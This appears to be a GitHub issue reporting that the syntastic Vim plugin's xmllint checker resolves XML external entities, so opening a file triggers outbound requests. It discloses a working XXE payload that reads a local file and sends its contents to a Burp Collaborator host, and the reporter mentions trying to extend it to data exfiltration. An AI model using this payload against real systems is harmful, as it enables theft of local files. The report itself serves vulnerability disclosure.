-
Notifications
You must be signed in to change notification settings - Fork 1.1k
Potential XXE #2274
Description
Hello,
yesterday I was pentesting a website and I was happy to see some XXE popping out in my Burp.
Then I realized that the requests weren't coming from the website but from my own machine!
So I investigated and found out that syntastic was making the requests while parsing my XML containing the XXE.
Here's one of the payloads I tested:
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE root [
<!ENTITY % data SYSTEM "file:///tmp/lol">
<!ENTITY % req2 SYSTEM 'http://mukoxxxxxxxxxxx5z.burpcollaborator.net/?%data;'>
%req2;
]>
And here's the results on Burp:
The requests are made each time syntastic parses the file, so also at the very moment you open it !
I found that the vulnerable part is in the file syntastic/syntax_checkers/xml/xmllint.vim
but I didn't yet get the logic and why it's making the requests (maybe it's a feature !), so I decided to make an issue to discuss if it's necessary to patch or it's a normal behavior.
I am not yet able to exfiltrate data but I'm working on it, and maybe there's other security ninjas with fancy tricks capable of doing it.
Other useful information:
VIM - Vi IMproved 8.1 (2018 May 18, compiled Jun 15 2019 16:41:15)
(Debian Stretch version)
-----
Syntastic version: 3.9.0-41 (Vim 801, Linux, GUI)
Info for filetype:
Global mode: active
Filetype is active
The current file will be checked automatically
Available checkers: -
Currently enabled checkers: -